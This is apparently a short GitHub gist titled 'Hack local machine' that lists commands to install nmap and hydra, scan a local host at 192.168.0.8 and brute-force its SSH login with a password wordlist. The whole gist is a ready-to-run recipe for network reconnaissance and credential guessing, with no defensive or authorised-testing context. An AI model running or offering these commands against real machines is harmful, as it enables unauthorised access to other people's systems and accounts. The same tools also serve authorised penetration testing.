Skip to content

Instantly share code, notes, and snippets.

@Yago
Created January 29, 2014 13:28
Show Gist options
  • Save Yago/68b19da1fa4f54ede0a4 to your computer and use it in GitHub Desktop.
Save Yago/68b19da1fa4f54ede0a4 to your computer and use it in GitHub Desktop.
Hack - Hack local machine
# install
$ brew install cmake
$ brew install libssh
$ brew install hydra
$ brew install nmap
$ ping 192.168.1.255
$ nmap -A 192.168.0.8
$ hydra -l User -P '/path/to/wordlist.txt' 192.168.0.8 ssh
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment